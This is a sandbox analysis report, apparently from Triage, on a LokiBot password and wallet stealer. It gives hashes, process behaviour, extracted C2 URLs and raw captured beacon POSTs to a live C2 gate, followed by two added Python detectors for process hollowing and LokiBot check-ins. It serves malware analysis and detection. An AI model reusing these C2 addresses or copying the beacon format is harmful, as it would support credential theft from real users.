Analysis

  • max time kernel: 120s
  • max time network: 134s
  • platform: windows10_x64
  • resource: win10-en-20211208
  • submitted: 25/01/2022, 10:08 UTC

General

  • Target: f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
  • Size: 243KB
  • MD5: 16f716620dd5c0151f14e9972ceece41
  • SHA1: 3769c9137ba48a84d40988d7ced98a61f3825c9b
  • SHA256: f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84
  • SHA512: cc01211f6bc71bfbf8de21f3a04b0944cc7be82dfdacaa0b47ac564f686ed7a4c28888e23d68feadb196d4a856cda06683b79a33f92cb38b1d9ed72903f622aa

Malware Config

Extracted

Family: lokibot

C2:
  • http://augmentinprod.ir/jin/five/fre.php
  • http://kbfvzoboss.bid/alien/fre.php
  • http://alphastand.trade/alien/fre.php
  • http://alphastand.win/alien/fre.php
  • http://alphastand.top/alien/fre.php

Signatures

  • Lokibot
    Lokibot is a password and cryptocurrency wallet stealer.
  • suricata: ET MALWARE LokiBot Checkin
  • suricata: ET MALWARE LokiBot User-Agent (Charon/Inferno)
  • Loads dropped DLL (1 IoC)
  • Reads user/profile data of web browsers (2 TTPs)
    Infostealers often target stored browser data, such as saved credentials and cookies.
  • Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  • Suspicious use of SetThreadContext (1 IoC)
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s). The generic signature text labels this as likely ransomware behaviour, but nothing else in this report supports that reading: no file encryption or ransom note is recorded, and the only network activity is a stealer C2 check-in. For a LokiBot sample treat it as drive enumeration during collection, not as a ransomware indicator.
  • Suspicious behavior: RenamesItself (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of WriteProcessMemory (9 IoCs)
  • outlook_office_path (1 IoC)
  • outlook_win_path (1 IoC)

Processes

  • C:\Users\Admin\AppData\Local\Temp\f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe (PID 2312)
    Command line: "C:\Users\Admin\AppData\Local\Temp\f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe"
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    • C:\Users\Admin\AppData\Local\Temp\f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe (PID 852, child of PID 2312)
      Command line: "C:\Users\Admin\AppData\Local\Temp\f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe"
      • Accesses Microsoft Outlook profiles
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
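The tree above shows the sample launching a second copy of itself: the parent (PID 2312) is the one tagged with SetThreadContext and WriteProcessMemory, while the child (PID 852) is the one that touches Outlook profiles, and the two 648KB memory dumps listed under Downloads are taken from the child's image region (0x400000-0x4A2000). That split is the usual footprint of process hollowing: the parent writes a payload into a suspended child of its own image and redirects its thread, so the unpacked code lives in the child. The heuristic below is an added example, not Triage's own signature logic; it encodes that rule and runs it over process records constructed from this page (the `Proc` type and tag strings are assumptions made for the example).

```python
"""Heuristic for the process-hollowing pattern in a sandbox process tree.

Added example, not part of the Triage report. Process records are
constructed from this page's Processes section; the rule is a generic
heuristic, not a Triage signature.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple

# Both primitives are attributed to the injecting parent, which writes the
# payload into a suspended child and then repoints the child's thread.
INJECTION_TAGS = {
    "Suspicious use of SetThreadContext",
    "Suspicious use of WriteProcessMemory",
}


@dataclass
class Proc:
    pid: int
    image: str
    parent: Optional[int]
    tags: Set[str] = field(default_factory=set)


def hollowing_candidates(procs: List[Proc]) -> List[Tuple[int, int]]:
    """Return (parent_pid, child_pid) pairs where a process spawned a copy of
    its own image, the parent shows both injection primitives, and the child,
    not the parent, carries the post-injection behaviour."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for child in procs:
        parent = by_pid.get(child.parent) if child.parent is not None else None
        if parent is None:
            continue
        same_image = parent.image.lower() == child.image.lower()
        parent_injects = INJECTION_TAGS <= parent.tags
        # anything beyond the injection tags on the child is "real" activity
        child_active = bool(child.tags - INJECTION_TAGS)
        if same_image and parent_injects and child_active:
            hits.append((parent.pid, child.pid))
    return hits


# Constructed from the Processes section of this report.
SAMPLE = ("C:\\Users\\Admin\\AppData\\Local\\Temp\\"
          "f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe")
TREE = [
    Proc(2312, SAMPLE, None, {
        "Loads dropped DLL",
        "Suspicious use of SetThreadContext",
        "Suspicious use of WriteProcessMemory",
    }),
    Proc(852, SAMPLE, 2312, {
        "Accesses Microsoft Outlook profiles",
        "Suspicious behavior: RenamesItself",
        "Suspicious use of AdjustPrivilegeToken",
        "outlook_office_path",
        "outlook_win_path",
    }),
]

if __name__ == "__main__":
    for parent_pid, child_pid in hollowing_candidates(TREE):
        print(f"PID {parent_pid} -> PID {child_pid}: self-spawn with "
              f"SetThreadContext + WriteProcessMemory in the parent; "
              f"dump and scan the child's image region, not the parent's")
```

When triaging this kind of tree, the child's image-region dump is the artifact to hash and scan; the parent is usually only the packer stub.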

Network

  • DNS augmentinprod.ir (US)
    Process: f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    Remote address: 8.8.8.8:53
    Request: augmentinprod.ir IN A
    Response: augmentinprod.ir IN A 172.67.131.97
              augmentinprod.ir IN A 104.21.3.248
  • POST http://augmentinprod.ir/jin/five/fre.php (US)
    Process: f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    Remote address: 172.67.131.97:80
    Request:
      POST /jin/five/fre.php HTTP/1.0
      User-Agent: Mozilla/4.08 (Charon; Inferno)
      Host: augmentinprod.ir
      Accept: */*
      Content-Type: application/octet-stream
      Content-Encoding: binary
      Content-Key: B94F9B44
      Content-Length: 358
      Connection: close
    Response:
      HTTP/1.1 200 OK
      Date: Tue, 25 Jan 2022 10:09:01 GMT
      Content-Type: text/html; charset=UTF-8
      Connection: close
      X-Frame-Options: SAMEORIGIN
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2P%2Bt%2FHSj746Oqc7HlqbCbRx%2BMcTB1OaLuDFo9BshAbUqr0w5hzVvfVH2Hl8ct0Z%2BOr3iifyXqmhUwSmA0YCPkZb99U1U7WL8r8pJeHe4%2FfRxhrnzaZ4Z5RzNfFUrfHbsa0%2Fm"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6d30b41fde474089-LHR
  • POST http://augmentinprod.ir/jin/five/fre.php (US)
    Process: f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    Remote address: 172.67.131.97:80
    Request:
      POST /jin/five/fre.php HTTP/1.0
      User-Agent: Mozilla/4.08 (Charon; Inferno)
      Host: augmentinprod.ir
      Accept: */*
      Content-Type: application/octet-stream
      Content-Encoding: binary
      Content-Key: B94F9B44
      Content-Length: 180
      Connection: close
    Response:
      HTTP/1.1 200 OK
      Date: Tue, 25 Jan 2022 10:09:01 GMT
      Content-Type: text/html; charset=UTF-8
      Connection: close
      X-Frame-Options: SAMEORIGIN
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bODpgMpRhE3ksmKcoIp5B5l6x50B1AvxktMMoIKW%2FTRbzNtlzcLgoT6x4CJAdjNCXAj8Hq6TIF86FzoHV4bC1zJAeaUJLHGP8G5k1nx5fcrt5ZBqvqsK9DI6YGPEqvdRo0B0"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6d30b4210d860081-LHR
  • POST http://augmentinprod.ir/jin/five/fre.php (US)
    Process: f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    Remote address: 172.67.131.97:80
    Request:
      POST /jin/five/fre.php HTTP/1.0
      User-Agent: Mozilla/4.08 (Charon; Inferno)
      Host: augmentinprod.ir
      Accept: */*
      Content-Type: application/octet-stream
      Content-Encoding: binary
      Content-Key: B94F9B44
      Content-Length: 153
      Connection: close
    Response:
      HTTP/1.1 200 OK
      Date: Tue, 25 Jan 2022 10:09:01 GMT
      Content-Type: text/html; charset=UTF-8
      Connection: close
      X-Frame-Options: SAMEORIGIN
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N4Z5kigCuZ%2BG8rS0mtDPwQ05iEIAO%2FexkvDhusmsho11EcEnIvs19fSQkkf3CVIsZOmvdJExK7IbE9OFab0gLSAR3xxgLF1IfB%2BKp5SRqNPf4iNeRi6BbB80F9Xph6Q4hZpb"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6d30b421dee57168-DUS
  • 209.197.3.8:80
    46 B / 40 B, 1 / 1 packets
  • 172.67.131.97:80 (http) http://augmentinprod.ir/jin/five/fre.php
    Process: f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    1.1kB / 5.2kB, 10 / 9 packets
    HTTP Request: POST http://augmentinprod.ir/jin/five/fre.php
    HTTP Response: 200
  • 172.67.131.97:80 (http) http://augmentinprod.ir/jin/five/fre.php
    Process: f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    741 B / 5.2kB, 7 / 8 packets
    HTTP Request: POST http://augmentinprod.ir/jin/five/fre.php
    HTTP Response: 200
  • 172.67.131.97:80 (http) http://augmentinprod.ir/jin/five/fre.php
    Process: f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    760 B / 5.2kB, 8 / 8 packets
    HTTP Request: POST http://augmentinprod.ir/jin/five/fre.php
    HTTP Response: 200
  • 8.8.8.8:53 (dns) augmentinprod.ir
    Process: f1ae5e52aa46bb46482d99dd0acf855320c71f8388c86195a6df94d02235ff84.exe
    62 B / 94 B, 1 / 1 packets
    DNS Request: augmentinprod.ir
    DNS Response: 172.67.131.97, 104.21.3.248
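The three beacons above share everything except Content-Length: an HTTP/1.0 POST of `application/octet-stream` to a `fre.php` gate, the `Mozilla/4.08 (Charon; Inferno)` User-Agent that the ET "LokiBot User-Agent (Charon/Inferno)" rule keys on, and a non-standard `Content-Key` header. The detector below is an added example, not the Triage report's or the Suricata rules' own logic; it parses raw request text, scores those traits, reconstructs the C2 URL and checks it against the extracted config. The sample requests are constructed from this page's Network section (a fourth, benign request is constructed for contrast), and the two-trait threshold is a choice made for the example.

```python
"""Flag LokiBot C2 check-ins in captured HTTP request text.

Added example, not part of the Triage report or the ET Suricata rules.
It keys on the traits the report exposes: the 'Charon; Inferno'
User-Agent, the non-standard Content-Key header, and an HTTP/1.0
octet-stream POST to a *fre.php gate.
"""

LOKI_UA = "Mozilla/4.08 (Charon; Inferno)"

# C2 URLs from the extracted config on this page, used to tie the observed
# beacon back to the static config.
EXTRACTED_C2 = {
    "http://augmentinprod.ir/jin/five/fre.php",
    "http://kbfvzoboss.bid/alien/fre.php",
    "http://alphastand.trade/alien/fre.php",
    "http://alphastand.win/alien/fre.php",
    "http://alphastand.top/alien/fre.php",
}


def beacon(content_length):
    """Constructed request text mirroring the captured POSTs (headers only);
    the three captures differ only in Content-Length."""
    return "\r\n".join([
        "POST /jin/five/fre.php HTTP/1.0",
        f"User-Agent: {LOKI_UA}",
        "Host: augmentinprod.ir",
        "Accept: */*",
        "Content-Type: application/octet-stream",
        "Content-Encoding: binary",
        "Content-Key: B94F9B44",
        f"Content-Length: {content_length}",
        "Connection: close",
        "", "",
    ])


BEACONS = [beacon(358), beacon(180), beacon(153)]
# Constructed benign request for contrast.
BENIGN = "GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"


def parse_request(raw):
    """Split a raw request into (method, path, version, {lower-cased header: value})."""
    lines = raw.split("\r\n")
    method, path, version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        if not line:  # blank line terminates the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers


def classify(raw):
    """Score a request against the LokiBot check-in traits; two or more
    matched traits is treated as a hit. Returns the reconstructed URL,
    Content-Key, declared body length, matched traits and the verdict."""
    method, path, version, h = parse_request(raw)
    reasons = []
    if h.get("user-agent") == LOKI_UA:
        reasons.append("charon/inferno user-agent")
    if "content-key" in h:
        reasons.append("content-key header")
    if (method, version, h.get("content-type")) == (
            "POST", "HTTP/1.0", "application/octet-stream"):
        reasons.append("http/1.0 octet-stream post")
    if path.endswith("fre.php"):
        reasons.append("fre.php gate")
    return {
        "url": f"http://{h.get('host', '')}{path}",
        "key": h.get("content-key"),
        "length": int(h.get("content-length", "0")),
        "reasons": reasons,
        "is_lokibot": len(reasons) >= 2,
    }


if __name__ == "__main__":
    for raw in BEACONS + [BENIGN]:
        r = classify(raw)
        verdict = "LOKIBOT" if r["is_lokibot"] else "ok"
        known = r["url"] in EXTRACTED_C2
        print(f"{verdict:8}{r['url']:45}key={r['key']} len={r['length']} "
              f"known_c2={known} {r['reasons']}")
```

The User-Agent alone is what the Suricata rule fires on and is the cheapest single indicator; the Content-Key header and the bare HTTP/1.0 POST are the traits that survive if an operator changes the UA string, which is why the example scores all of them rather than matching one.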

MITRE ATT&CK Enterprise v6


Downloads

  • memory/852-119-0x0000000000400000-0x00000000004A2000-memory.dmp (648KB)
  • memory/852-121-0x0000000000400000-0x00000000004A2000-memory.dmp (648KB)
  • memory/2312-120-0x0000000002460000-0x0000000002464000-memory.dmp (16KB)
